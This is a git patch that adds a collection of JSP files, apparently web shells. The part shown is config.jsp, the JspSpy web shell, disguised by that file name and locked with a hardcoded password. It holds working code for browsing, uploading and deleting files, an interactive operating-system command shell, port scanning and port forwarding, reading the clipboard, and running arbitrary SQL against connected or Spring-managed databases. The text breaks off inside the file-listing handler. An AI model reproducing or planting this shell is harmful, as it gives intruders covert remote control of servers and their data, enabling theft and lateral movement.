From c9eb305ae07587534229f4df8bcb7a540c031774 Mon Sep 17 00:00:00 2001 From: tennc Date: Wed, 4 Sep 2013 09:12:21 +0800 Subject: [PATCH] update jsp --- jsp/config.jsp | 4237 ++++++++++++++++++++++++++++++++++++++++++++++++ jsp/k8cmd.jsp | 70 + jsp/ma (1).jsp | 59 + jsp/maint.jsp | 59 + jsp/myxx1.jsp | 4201 +++++++++++++++++++++++++++++++++++++++++++++++ jsp/one8.jsp | 1 + jsp/tree.jsp | 68 + jsp/ver007.jsp | 1 + jsp/ver008.jsp | 59 + jsp/web.jsp | 1 + 10 files changed, 8756 insertions(+) create mode 100644 jsp/config.jsp create mode 100644 jsp/k8cmd.jsp create mode 100644 jsp/ma (1).jsp create mode 100644 jsp/maint.jsp create mode 100644 jsp/myxx1.jsp create mode 100644 jsp/one8.jsp create mode 100644 jsp/tree.jsp create mode 100644 jsp/ver007.jsp create mode 100644 jsp/ver008.jsp create mode 100644 jsp/web.jsp diff --git a/jsp/config.jsp b/jsp/config.jsp new file mode 100644 index 0000000..30c925c --- /dev/null +++ b/jsp/config.jsp @@ -0,0 +1,4237 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.lang.reflect.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.util.jar.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%@page import="javax.sql.DataSource"%> +<%@page import="org.springframework.web.context.WebApplicationContext"%> +<%@page import="org.springframework.web.context.support.WebApplicationContextUtils"%> +<%!private static final String PW = "PW"; //password + private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; + private static final String REQUEST_CHARSET = "ISO-8859-1"; + private static final String PAGE_CHARSET = "UTF-8"; + private static final String CURRENT_DIR = "currentdir"; + private static final String MSG = "SHOWMSG"; + private static final String PORT_MAP = "PMSA"; + private static final String DBO = "DBO"; + private static final String SHELL_ONLINE = "SHELL_ONLINE"; + private static final String ENTER = "ENTER_FILE"; + private static final String ENTER_MSG = "ENTER_FILE_MSG"; + private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; + private static final String SESSION_O = "SESSION_O"; + private static String SHELL_NAME = ""; + private static String WEB_ROOT = null; + private static String SHELL_DIR = null; + public static Map ins = new HashMap(); + private static boolean ISLINUX = false; + + private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; + private static final String BACK_HREF = " Back"; + + private static class MyRequest extends HttpServletRequestWrapper { + public MyRequest(HttpServletRequest req) { + super(req); + } + + public String getParameter(String name) { + try { + String value = super.getParameter(name); + if (name == null) + return null; + return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET); + } catch (Exception e) { + return null; + } + } + } + + private static class SpyClassLoader extends ClassLoader { + public SpyClassLoader() { + } + + public Class defineClass(String name, byte[] b) { + return super.defineClass(name, b, 0, b.length - 2); + } + } + + private static class DBOperator implements Serializable { + private Connection conn = null; + private Statement stmt = null; + private String driver; + private String url; + private String uid; + private String pwd; + private String dsStr; + private DataSource dataSource; + public DBOperator(DataSource dataSource,String dsStr,boolean connect){ + this.dataSource = dataSource; + this.dsStr = dsStr; + if (connect){ + try{ + this.conn = dataSource.getConnection(); + }catch(SQLException e){ + e.printStackTrace(); + } + } + + } + public DBOperator(String driver, String url, String uid, String pwd) + throws Exception { + this(driver, url, uid, pwd, false); + } + + public DBOperator(String driver, String url, String uid, String pwd, + boolean connect) throws Exception { + Class.forName(driver); + if (connect) + this.conn = DriverManager.getConnection(url, uid, pwd); + this.url = url; + this.driver = driver; + this.uid = uid; + this.pwd = pwd; + } + + public void connect() throws Exception { + if(dataSource!=null){ + this.conn = dataSource.getConnection(); + }else{ + this.conn = DriverManager.getConnection(url, uid, pwd); + } + } + + public Object execute(String sql) throws Exception { + if (isValid()) { + stmt = conn.createStatement(); + if (stmt.execute(sql)) { + return stmt.getResultSet(); + } else { + return "" + stmt.getUpdateCount(); + } + } + throw new Exception("Connection is inValid."); + } + + public void closeStmt() throws Exception { + if (this.stmt != null) + stmt.close(); + } + + public boolean isValid() throws Exception { + return conn != null && !conn.isClosed(); + } + + public void close() throws Exception { + if (isValid()) { + closeStmt(); + conn.close(); + } + } + + public boolean equals(Object o) { + if (o instanceof DBOperator) { + DBOperator dbo = (DBOperator) o; + return this.driver.equals(dbo.driver) + && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) + && this.pwd.equals(dbo.pwd); + } + return false; + } + + public Connection getConn() { + return this.conn; + } + } + + private static class StreamConnector extends Thread { + private InputStream is; + private OutputStream os; + + public StreamConnector(InputStream is, OutputStream os) { + this.is = is; + this.os = os; + } + + public void run() { + BufferedReader in = null; + BufferedWriter out = null; + try { + in = new BufferedReader(new InputStreamReader(this.is)); + out = new BufferedWriter(new OutputStreamWriter(this.os)); + char buffer[] = new char[8192]; + int length; + while ((length = in.read(buffer, 0, buffer.length)) > 0) { + out.write(buffer, 0, length); + out.flush(); + } + } catch (Exception e) { + } + try { + if (in != null) + in.close(); + if (out != null) + out.close(); + } catch (Exception e) { + } + } + + public static void readFromLocal(final DataInputStream localIn, + final DataOutputStream remoteOut) { + new Thread(new Runnable() { + public void run() { + while (true) { + try { + byte[] data = new byte[100]; + int len = localIn.read(data); + while (len != -1) { + remoteOut.write(data, 0, len); + len = localIn.read(data); + } + } catch (Exception e) { + break; + } + } + } + }).start(); + } + + public static void readFromRemote(final Socket soc, + final Socket remoteSoc, final DataInputStream remoteIn, + final DataOutputStream localOut) { + new Thread(new Runnable() { + public void run() { + while (true) { + try { + byte[] data = new byte[100]; + int len = remoteIn.read(data); + while (len != -1) { + localOut.write(data, 0, len); + len = remoteIn.read(data); + } + } catch (Exception e) { + try { + soc.close(); + remoteSoc.close(); + } catch (Exception ex) { + } + break; + } + } + } + }).start(); + } + } + + private static class EnterFile extends File { + private ZipFile zf = null; + private ZipEntry entry = null; + private boolean isDirectory = false; + private String absolutePath = null; + + public void setEntry(ZipEntry e) { + this.entry = e; + } + + public void setAbsolutePath(String p) { + this.absolutePath = p; + } + + public void close() throws Exception { + this.zf.close(); + } + + public void setZf(String p) throws Exception { + if (p.toLowerCase().endsWith(".jar")) + this.zf = new JarFile(p); + else + this.zf = new ZipFile(p); + } + + public EnterFile(File parent, String child) { + super(parent, child); + } + + public EnterFile(String pathname) { + super(pathname); + } + + public EnterFile(String pathname, boolean isDir) { + this(pathname); + this.isDirectory = isDir; + } + + public EnterFile(String parent, String child) { + super(parent, child); + } + + public EnterFile(URI uri) { + super(uri); + } + + public boolean exists() { + return new File(this.zf.getName()).exists(); + } + + public File[] listFiles() { + java.util.List list = new ArrayList(); + java.util.List handled = new ArrayList(); + String currentDir = super.getPath(); + currentDir = currentDir.replace('\\', '/'); + if (currentDir.indexOf("/") == 0) { + if (currentDir.length() > 1) + currentDir = currentDir.substring(1); + else + currentDir = ""; + } + Enumeration e = this.zf.entries(); + while (e.hasMoreElements()) { + ZipEntry entry = (ZipEntry) e.nextElement(); + String eName = entry.getName(); + if (this.zf instanceof JarFile) { + if (!entry.isDirectory()) { + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + try { + ef.setZf(this.zf.getName()); + } catch (Exception ex) { + } + list.add(ef); + } + } else { + if (currentDir.equals("")) { + //zip root directory + if (eName.indexOf("/") == -1 + || eName.matches("[^/]+/$")) { + EnterFile ef = new EnterFile(eName.replaceAll("/", + "")); + handled.add(eName.replaceAll("/", "")); + ef.setEntry(entry); + list.add(ef); + } else { + if (eName.indexOf("/") != -1) { + String tmp = eName.substring(0, eName + .indexOf("/")); + if (!handled.contains(tmp) + && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp, true); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } + } + } else { + if (eName.startsWith(currentDir)) { + if (eName.matches(currentDir + "/[^/]+/?$")) { + //file. + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + list.add(ef); + if (eName.endsWith("/")) { + String tmp = eName.substring(eName + .lastIndexOf('/', + eName.length() - 2)); + tmp = tmp.substring(1, tmp.length() - 1); + handled.add(tmp); + } + } else { + //dir + try { + String tmp = eName.substring(currentDir + .length() + 1); + tmp = tmp.substring(0, tmp.indexOf('/')); + if (!handled.contains(tmp) + && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp, true); + ef.setAbsolutePath(currentDir + "/" + + tmp); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } catch (Exception ex) { + } + } + } + } + } + } + return (File[]) list.toArray(new File[0]); + } + + public boolean isDirectory() { + return this.entry.isDirectory() || this.isDirectory; + } + + public String getParent() { + return ""; + } + + public String getAbsolutePath() { + return absolutePath != null ? absolutePath : super.getPath(); + } + + public String getName() { + if (this.zf instanceof JarFile) { + return this.getAbsolutePath(); + } else { + return super.getName(); + } + } + + public long lastModified() { + return entry.getTime(); + } + + public boolean canRead() { + return false; + } + + public boolean canWrite() { + return false; + } + + public boolean canExecute() { + return false; + } + + public long length() { + return entry.getSize(); + } + } + + private static class OnLineProcess { + private String cmd = "first"; + private Process pro; + + public OnLineProcess(Process p) { + this.pro = p; + } + + public void setPro(Process p) { + this.pro = p; + } + + public void setCmd(String c) { + this.cmd = c; + } + + public String getCmd() { + return this.cmd; + } + + public Process getPro() { + return this.pro; + } + + public void stop() { + this.pro.destroy(); + } + } + + private static class OnLineConnector extends Thread { + private OnLineProcess ol = null; + private InputStream is; + private OutputStream os; + private String name; + + public OnLineConnector(InputStream is, OutputStream os, String name, + OnLineProcess ol) { + this.is = is; + this.os = os; + this.name = name; + this.ol = ol; + } + + public void run() { + BufferedReader in = null; + BufferedWriter out = null; + try { + in = new BufferedReader(new InputStreamReader(this.is)); + out = new BufferedWriter(new OutputStreamWriter(this.os)); + char buffer[] = new char[128]; + if (this.name.equals("exeRclientO")) { + //from exe to client + int length = 0; + while ((length = in.read(buffer, 0, buffer.length)) > 0) { + String str = new String(buffer, 0, length); + str = str.replaceAll("&", "&").replaceAll("<", + "<").replaceAll(">", ">"); + str = str.replaceAll("" + (char) 13 + (char) 10, + "
"); + str = str.replaceAll("\n", "
"); + out.write(str.toCharArray(), 0, str.length()); + out.flush(); + } + } else { + //from client to exe + while (true) { + while (this.ol.getCmd() == null) { + Thread.sleep(500); + } + if (this.ol.getCmd().equals("first")) { + this.ol.setCmd(null); + continue; + } + this.ol.setCmd(this.ol.getCmd() + (char) 10); + char[] arr = this.ol.getCmd().toCharArray(); + out.write(arr, 0, arr.length); + out.flush(); + this.ol.setCmd(null); + } + } + } catch (Exception e) { + } + try { + if (in != null) + in.close(); + if (out != null) + out.close(); + } catch (Exception e) { + } + } + } + + private static class Table { + private ArrayList rows = null; + private boolean echoTableTag = false; + + public void setEchoTableTag(boolean v) { + this.echoTableTag = v; + } + + public Table() { + this.rows = new ArrayList(); + } + + public void addRow(Row r) { + this.rows.add(r); + } + + public String toString() { + StringBuffer html = new StringBuffer(); + if (echoTableTag) + html.append(""); + for (int i = 0; i < rows.size(); i++) { + Row r = (Row) rows.get(i); + html + .append(""); + ArrayList columns = r.getColumns(); + for (int a = 0; a < columns.size(); a++) { + Column c = (Column) columns.get(a); + html.append(""); + } + html.append(""); + } + if (echoTableTag) + html.append("
"); + String vv = Util.htmlEncode(Util.getStr(c.getValue())); + if (vv.equals("")) + vv = " "; + html.append(vv); + html.append("
"); + return html.toString(); + } + + public static String rs2Table(ResultSet rs, String sep, boolean op) + throws Exception { + StringBuffer table = new StringBuffer(); + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + if (!op) + table + .append(" View Struct - View All Tables

"); + else + table + .append(" All Tables

"); + table + .append(""); + table + .append(""); + for (int i = 1; i <= count; i++) { + table.append(""); + } + if (op) + table.append(""); + table.append(""); + while (rs.next()) { + String tbName = null; + table + .append(""); + for (int i = 1; i <= count; i++) { + String v = rs.getString(i); + if (i == 3) + tbName = v; + table.append(""); + } + if (op) + table + .append(""); + table.append(""); + } + table.append("
" + meta.getColumnName(i) + " 
" + Util.null2Nbsp(v) + " View | Struct | Export | Save To File

"); + return table.toString(); + } + } + + private static class Row { + private ArrayList cols = null; + + public Row() { + this.cols = new ArrayList(); + } + + public void addColumn(Column n) { + this.cols.add(n); + } + + public ArrayList getColumns() { + return this.cols; + } + } + + private static class Column { + private String value; + + public Column(String v) { + this.value = v; + } + + public String getValue() { + return this.value; + } + } + + private static class Util { + public static boolean isEmpty(String s) { + return s == null || s.trim().equals(""); + } + + public static boolean isEmpty(Object o) { + return o == null || isEmpty(o.toString()); + } + + public static String getSize(long size, char danwei) { + if (danwei == 'M') { + double v = formatNumber(size / 1024.0 / 1024.0, 2); + if (v > 1024) { + return getSize(size, 'G'); + } else { + return v + "M"; + } + } else if (danwei == 'G') { + return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G"; + } else if (danwei == 'K') { + double v = formatNumber(size / 1024.0, 2); + if (v > 1024) { + return getSize(size, 'M'); + } else { + return v + "K"; + } + } else if (danwei == 'B') { + if (size > 1024) { + return getSize(size, 'K'); + } else { + return size + "B"; + } + } + return "" + 0 + danwei; + } + + public static boolean exists(String[] arr, String v) { + for (int i = 0; i < arr.length; i++) { + if (v.equals(arr[i])) { + return true; + } + } + return false; + } + + public static double formatNumber(double value, int l) { + NumberFormat format = NumberFormat.getInstance(); + format.setMaximumFractionDigits(l); + format.setGroupingUsed(false); + return new Double(format.format(value)).doubleValue(); + } + + public static boolean isInteger(String v) { + if (isEmpty(v)) + return false; + return v.matches("^\\d+$"); + } + + public static String formatDate(long time) { + SimpleDateFormat format = new SimpleDateFormat( + "yyyy-MM-dd hh:mm:ss"); + return format.format(new java.util.Date(time)); + } + + public static String convertPath(String path) { + return path != null ? path.replace('\\', '/') : ""; + } + + public static String htmlEncode(String v) { + if (isEmpty(v)) + return ""; + return v.replaceAll("&", "&").replaceAll("<", "<") + .replaceAll(">", ">"); + } + + public static String getStr(String s) { + return s == null ? "" : s; + } + + public static String null2Nbsp(String s) { + if (s == null) + s = " "; + return s; + } + + public static String getStr(Object s) { + return s == null ? "" : s.toString(); + } + + public static String exec(String regex, String str, int group) { + Pattern pat = Pattern.compile(regex); + Matcher m = pat.matcher(str); + if (m.find()) + return m.group(group); + return null; + } + + public static void outMsg(Writer out, String msg) throws Exception { + outMsg(out, msg, "center"); + } + + public static void outMsg(Writer out, String msg, String align) + throws Exception { + out + .write("
" + + msg + + "
"); + } + + public static String highLight(String str) { + str = str + .replaceAll( + "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b", + "$1"); + str = str.replaceAll("\t(//.+)", + "\t$1"); + return str; + } + } + + private static class UploadBean { + private String fileName = null; + private String suffix = null; + private String savePath = ""; + private ServletInputStream sis = null; + private OutputStream targetOutput = null; + private byte[] b = new byte[1024]; + + public void setTargetOutput(OutputStream stream) { + this.targetOutput = stream; + } + + public UploadBean() { + } + + public void setSavePath(String path) { + this.savePath = path; + } + + public String getFileName() { + return this.fileName; + } + + public void parseRequest(HttpServletRequest request) throws IOException { + sis = request.getInputStream(); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b, 0, b.length)) != -1) { + s = new String(b, 0, a, PAGE_CHARSET); + if ((k = s.indexOf("filename=\"")) != -1) { + s = s.substring(k + 10); + k = s.indexOf("\""); + s = s.substring(0, k); + File tF = new File(s); + if (tF.isAbsolute()) { + fileName = tF.getName(); + } else { + fileName = s; + } + k = s.lastIndexOf("."); + suffix = s.substring(k + 1); + upload(); + } + } + } + + private void upload() throws IOException { + try { + OutputStream out = null; + if (this.targetOutput != null) + out = this.targetOutput; + else + out = new FileOutputStream(new File(savePath, fileName)); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b, 0, b.length)) != -1) { + s = new String(b, 0, a); + if ((k = s.indexOf("Content-Type:")) != -1) { + break; + } + } + sis.readLine(b, 0, b.length); + while ((a = sis.readLine(b, 0, b.length)) != -1) { + s = new String(b, 0, a); + if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) + && (b[3] == 45) && (b[4] == 45)) { + break; + } + out.write(b, 0, a); + } + if (out instanceof FileOutputStream) + out.close(); + } catch (IOException ioe) { + throw ioe; + } + } + }%> +<% + + SHELL_NAME = request.getServletPath().substring( + request.getServletPath().lastIndexOf("/") + 1); + String myAbsolutePath = application.getRealPath(request + .getServletPath()); + if (Util.isEmpty(myAbsolutePath)) {//for weblogic + SHELL_NAME = request.getServletPath(); + myAbsolutePath = new File(application.getResource("/") + .getPath() + + SHELL_NAME).toString(); + SHELL_NAME = request.getContextPath() + SHELL_NAME; + WEB_ROOT = new File(application.getResource("/").getPath()) + .toString(); + } else { + WEB_ROOT = application.getRealPath("/"); + } + SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0, + myAbsolutePath.lastIndexOf(File.separator))); + if (SHELL_DIR.indexOf('/') == 0) + ISLINUX = true; + else + ISLINUX = false; + if (session.getAttribute(CURRENT_DIR) == null) + session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR)); + //request = new MyRequest(request); + if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null + || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { + String o = request.getParameter("o"); + if(o != null) + o = new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET); + if (o != null && o.equals("login")) { + ((Invoker) ins.get("login")).invoke(request, response, + session); + return; + } else if (o != null && o.equals("vLogin")) { + ((Invoker) ins.get("vLogin")).invoke(request, response, + session); + return; + } else { + ((Invoker) ins.get("vLogin")).invoke(request, response, + session); + return; + } + } +%> +<%!private static interface Invoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception; + + public boolean doBefore(); + + public boolean doAfter(); + } + + private static class DefaultInvoker implements Invoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + } + + public boolean doBefore() { + return true; + } + + public boolean doAfter() { + return true; + } + } + + private static class ScriptInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println(""); + + } catch (Exception e) { + + throw e; + } + } + } + + private static class BeforeInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("JspSpy"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class AfterInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out.println(""); + } catch (Exception e) { + + throw e; + } + } + } + + private static class DeleteBatchInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String files = request.getParameter("files"); + int success = 0; + int failed = 0; + if (!Util.isEmpty(files)) { + String currentDir = JSession.getAttribute(CURRENT_DIR) + .toString(); + String[] arr = files.split(","); + for (int i = 0; i < arr.length; i++) { + String fs = arr[i]; + File f = new File(currentDir, fs); + if (f.delete()) + success += 1; + else + failed += 1; + } + } + JSession + .setAttribute( + MSG, + success + + " Files Deleted Success , " + + failed + + " Files Deleted Failed!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class ClipBoardInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("" + + " " + + " " + " " + + "
" + + "

System Clipboard »

" + + "

");
+				try {
+					out.println(Util.htmlEncode(Util.getStr(Toolkit
+							.getDefaultToolkit().getSystemClipboard()
+							.getContents(DataFlavor.stringFlavor)
+							.getTransferData(DataFlavor.stringFlavor))));
+				} catch (Exception ex) {
+					out.println("ClipBoard is Empty Or Is Not Text Data !");
+				}
+				out
+						.println("
" + + " " + + "

" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VPortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + if (Util.isEmpty(ip)) + ip = "127.0.0.1"; + if (Util.isEmpty(ports)) + ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; + if (Util.isEmpty(timeout)) + timeout = "2"; + out + .println("
" + + "

PortScan >>

" + + "
" + + "

" + + "IP : Port : Banner Timeout (Second) : " + + "

" + + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class PortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + ((Invoker) ins.get("vPortScan")).invoke(request, response, + JSession); + out.println("
"); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + int iTimeout = 0; + if (Util.isEmpty(ip) || Util.isEmpty(ports)) + return; + if (!Util.isInteger(timeout)) { + timeout = "2"; + } + iTimeout = Integer.parseInt(timeout); + Map rs = new LinkedHashMap(); + String[] portArr = ports.split(","); + for (int i = 0; i < portArr.length; i++) { + String port = portArr[i]; + BufferedReader r = null; + try { + Socket s = new Socket(); + s.connect(new InetSocketAddress(ip, Integer + .parseInt(port)), iTimeout); + s.setSoTimeout(iTimeout); + if (!Util.isEmpty(banner)) { + r = new BufferedReader(new InputStreamReader(s + .getInputStream())); + StringBuffer sb = new StringBuffer(); + String b = r.readLine(); + while (b != null) { + sb.append(b + " "); + try { + b = r.readLine(); + } catch (Exception e) { + break; + } + } + rs.put(port, + "Open " + + sb.toString() + ""); + r.close(); + } else { + rs.put(port, "Open"); + } + s.close(); + } catch (Exception e) { + if (e.toString().toLowerCase() + .indexOf("read timed out") != -1) { + rs + .put( + port, + "Open <<No Banner!>>"); + if (r != null) + r.close(); + } else { + rs.put(port, "Close"); + } + } + } + out.println("
"); + Set entrySet = rs.entrySet(); + Iterator it = entrySet.iterator(); + while (it.hasNext()) { + Map.Entry e = (Map.Entry) it.next(); + String port = (String) e.getKey(); + String value = (String) e.getValue(); + out.println(ip + " : " + port + + " ................................. " + value + "
"); + } + out.println("
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VConnInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object obj = JSession.getAttribute(DBO); + if (obj == null || !((DBOperator) obj).isValid()) { + out + .println(" "); + out + .println("
" + + "
" + + "" + + "

DataBase Manager »

" + + "" + + "

" + + "DataSource:" + + " " + + "Driver:" + + " " + + "URL:" + + "" + + "UID:" + + "" + + "PWD:" + + "" + + "DataBase:" + + " " + + "" + + "

" + + "
"); + } else { + ((Invoker) ins.get("dbc")).invoke(request, response, + JSession); + } + } catch (ClassCastException e) { + throw e; + } catch (Exception e) { + + throw e; + } + } + } + + //DBConnect + private static class DbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String driver = request.getParameter("driver"); + String url = request.getParameter("url"); + String uid = request.getParameter("uid"); + String pwd = request.getParameter("pwd"); + String sql = request.getParameter("sql"); + String dataSource = request.getParameter("dataSource"); + String selectDb = request.getParameter("selectDb"); + if (selectDb == null) + selectDb = JSession.getAttribute("selectDb").toString(); + else + JSession.setAttribute("selectDb", selectDb); + Object dbo = JSession.getAttribute(DBO); + if (dbo == null || !((DBOperator) dbo).isValid()) { + if (dbo != null) + ((DBOperator) dbo).close(); + if(!Util.isEmpty(dataSource)){ + WebApplicationContext appContext = WebApplicationContextUtils.getWebApplicationContext(JSession.getServletContext()); + DataSource dsObj = (DataSource) appContext.getBean(dataSource); + dbo = new DBOperator(dsObj,dataSource,true); + }else{ + dbo = new DBOperator(driver,url,uid,pwd,true); + } + } else { + if (!Util.isEmpty(dataSource) || (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid))) { + DBOperator oldDbo = (DBOperator)dbo; + if(!Util.isEmpty(dataSource)){ + WebApplicationContext appContext = WebApplicationContextUtils.getWebApplicationContext(JSession.getServletContext()); + DataSource dsObj = (DataSource) appContext.getBean(dataSource); + dbo = new DBOperator(dsObj,dataSource,false); + }else{ + dbo = new DBOperator(driver,url,uid,pwd); + } + if (!oldDbo.equals(dbo)) { + ((DBOperator)oldDbo).close(); + ((DBOperator)dbo).connect(); + } else { + dbo = oldDbo; + } + } + } + DBOperator Ddbo = (DBOperator) dbo; + JSession.setAttribute(DBO, Ddbo); + if (!Util.isEmpty(request.getParameter("type")) + && request.getParameter("type").equals("switch")) { + Ddbo.getConn().setCatalog(request.getParameter("catalog")); + } + Util.outMsg(out, "Connect To DataBase Success!"); + out + .println(" "); + out + .println("
" + + "
" + + "" + + "

DataBase Manager »

" + + "" + + "

" + + "DataSource:" + + " " + + "Driver:" + + " " + + "URL:" + + "" + + "UID:" + + "" + + "PWD:" + + "" + + "DataBase:" + + " " + + "" + + "

" + + "
"); + DatabaseMetaData meta = Ddbo.getConn().getMetaData(); + out + .println("
" + + "

Version : " + + meta.getDatabaseProductName() + + " , " + + meta.getDatabaseProductVersion() + + "
URL : " + + meta.getURL() + + "
Catalog : " + + Ddbo.getConn().getCatalog() + + "
UserName : " + + meta.getUserName() + + "

Run SQL query/queries on database / Switch Database : "); + out + .println("

"); + if (Util.isEmpty(sql)) { + String type = request.getParameter("type"); + if (Util.isEmpty(type) || type.equals("switch")) { + ResultSet tbs = meta.getTables(null, null, null, null); + out.println(Table.rs2Table(tbs, meta + .getIdentifierQuoteString(), true)); + tbs.close(); + } else if (type.equals("struct")) { + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + ResultSet t = meta.getColumns(null, null, tb, null); + out.println(Table.rs2Table(t, "", false)); + t.close(); + } + } + } catch (Exception e) { + JSession + .setAttribute( + MSG, + "Some Error Occurred. Please Check Out the StackTrace Follow." + + BACK_HREF); + throw e; + } + } + } + + private static class ExecuteSQLInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String sql = request.getParameter("sql"); + String db = request.getParameter("selectDb"); + Object dbo = JSession.getAttribute(DBO); + if (!Util.isEmpty(sql)) { + if (dbo == null || !((DBOperator) dbo).isValid()) { + ((Invoker) ins.get("vConn")).invoke(request, response, + JSession); + return; + } else { + ((Invoker) ins.get("dbc")).invoke(request, response, + JSession); + Object obj = ((DBOperator) dbo).execute(sql); + if (obj instanceof ResultSet) { + ResultSet rs = (ResultSet) obj; + ResultSetMetaData meta = rs.getMetaData(); + int colCount = meta.getColumnCount(); + out + .println("Query#0 : " + + Util.htmlEncode(sql) + + "

"); + out + .println(""); + for (int i = 1; i <= colCount; i++) { + out.println(""); + } + out.println(""); + Table tb = new Table(); + while (rs.next()) { + Row r = new Row(); + for (int i = 1; i <= colCount; i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + r.addColumn(new Column(v)); + } + tb.addRow(r); + } + out.println(tb.toString()); + out.println("
" + + meta.getColumnName(i) + "
" + + meta.getColumnTypeName(i) + + "

"); + rs.close(); + ((DBOperator) dbo).closeStmt(); + } else { + out + .println("affected rows : " + + obj + "

"); + } + } + } else { + ((Invoker) ins.get("dbc")).invoke(request, response, + JSession); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class VLoginInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("jspspy
" + + "" + + "

Password: " + + " " + + " " + + " " + + "
" + + "

" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class LoginInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String inputPw = request.getParameter("pw"); + if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { + ((Invoker) ins.get("vLogin")).invoke(request, response, + JSession); + return; + } else { + JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw); + response.sendRedirect(SHELL_NAME); + return; + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class MyComparator implements Comparator { + public int compare(Object obj1, Object obj2) { + try { + if (obj1 != null && obj2 != null) { + File f1 = (File) obj1; + File f2 = (File) obj2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + return f1.getName().compareTo(f2.getName()); + } else { + return -1; + } + } else { + if (f2.isDirectory()) { + return 1; + } else { + return f1.getName().toLowerCase().compareTo( + f2.getName().toLowerCase()); + } + } + } + return 0; + } catch (Exception e) { + return 0; + } + } + } + + private static class FileListInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + 